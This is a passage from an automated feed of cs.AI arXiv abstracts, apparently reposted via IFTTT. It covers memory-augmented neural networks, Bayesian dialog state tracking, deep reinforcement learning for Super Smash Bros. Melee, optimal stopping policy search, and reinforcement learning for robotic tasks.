Reason and inference require process as well as memory skills by humans. Neural networks are able to process tasks like image recognition (better than humans) but in memory aspects are still limited (by attention mechanism, size). Recurrent Neural Network (RNN) and it's modified version LSTM are able to solve small memory contexts, but as context becomes larger than a threshold, it is difficult to use them. The Solution is to use large external memory. Still, it poses many challenges like, how to train neural networks for discrete memory representation, how to describe long term dependencies in sequential data etc. Most prominent neural architectures for such tasks are Memory networks: inference components combined with long term memory and Neural Turing Machines: neural networks using external memory resources. Also, additional techniques like attention mechanism, end to end gradient descent on discrete memory representation are needed to support these solutions. Preliminary results of above neural architectures on simple algorithms (sorting, copying) and Question Answering (based on story, dialogs) application are comparable with the state of the art. In this paper, I explain these architectures (in general), the additional techniques used and the results of their application.



from cs.AI updates on arXiv.org http://ift.tt/2kJOf4a
via IFTTT

The Dialog State Tracking Challenge with Bayesian Approach. (arXiv:1702.06199v1 [cs.AI])

Generative model has been one of the most common approaches for solving the Dialog State Tracking Problem with the capabilities to model the dialog hypotheses in an explicit manner. The most important task in such Bayesian networks models is constructing the most reliable user models by learning and reflecting the training data into the probability distribution of user actions conditional on networks states. This paper provides an overall picture of the learning process in a Bayesian framework with an emphasize on the state-of-the-art theoretical analyses of the Expectation Maximization learning algorithm.



from cs.AI updates on arXiv.org http://ift.tt/2llf0KB
via IFTTT

Beating the World's Best at Super Smash Bros. with Deep Reinforcement Learning. (arXiv:1702.06230v1 [cs.AI])

There has been a recent explosion in the capabilities of game-playing artificial intelligence. Many classes of RL tasks, from Atari games to motor control to board games, are now solvable by fairly generic algorithms, based on deep learning, that learn to play from experience with minimal knowledge of the specific domain of interest. In this work, we will investigate the performance of these methods on Super Smash Bros. Melee (SSBM), a popular console fighting game. The SSBM environment has complex dynamics and partial observability, making it challenging for human and machine alike. The multi-player aspect poses an additional challenge, as the vast majority of recent advances in RL have focused on single-agent environments. Nonetheless, we will show that it is possible to train agents that are competitive against and even surpass human professionals, a new result for the multi-player video game setting.



from cs.AI updates on arXiv.org http://ift.tt/2l5Qn27
via IFTTT

Sample Efficient Policy Search for Optimal Stopping Domains. (arXiv:1702.06238v1 [cs.AI])

Arising naturally in many fields, optimal stopping problems consider the question of deciding when to stop an observation-generating process. We examine the problem of simultaneously learning and planning in such domains, when data is collected directly from the environment. We propose GFSE, a simple and flexible model-free policy search method that reuses data for sample efficiency by leveraging problem structure. We bound the sample complexity of our approach to guarantee uniform convergence of policy value estimates, tightening existing PAC bounds to achieve logarithmic dependence on horizon length for our setting. We also examine the benefit of our method against prevalent model-based and model-free approaches on 3 domains taken from diverse fields.



from cs.AI updates on arXiv.org http://ift.tt/2kJEl2h
via IFTTT

Towards a Common Implementation of Reinforcement Learning for Multiple Robotic Tasks. (arXiv:1702.06329v1 [cs.AI])

Mobile robots are increasingly being employed for performing complex tasks in dynamic environments. Reinforcement learning (RL) methods are recognized to be promising for specifying such tasks in a relatively simple manner. However, the strong dependency between the learning method and the task to learn is a well-known problem that restricts practical implementations of RL in robotics, often requiring major modifications of parameters and adding other techniques for each particular task. In this paper we present a practical core implementation of RL which enables the learning process for multiple robotic tasks with minimal per-task tuning or none. Based on value iteration methods, this implementation includes a novel approach for action selection, called Q-biased softmax regression (QBIASSR), which avoids poor performance of the learning process when the robot reaches new unexplored states. Our approach takes advantage of the structure of the state space by attending the physical variables involved (e.g., distances to obstacles, X,Y,{\theta} pose, etc.), thus experienced sets of states may favor the decision-making process of unexplored or rarely-explored states. This improvement has a relevant role in reducing the tuning of the algorithm for particular tasks. Experiments with real and simulated robots, performed with the software framework also introduced here, show that our implementation is effectively able to learn different robotic tasks without tuning the learning method. Results also suggest that the combination of true online SARSA({\lambda}) with QBIASSR can outperform the existing RL core algorithms in low-dimensional robotic tasks.



from cs.AI updates on arXiv.org http://ift.tt/2kJOkEH
via IFTTT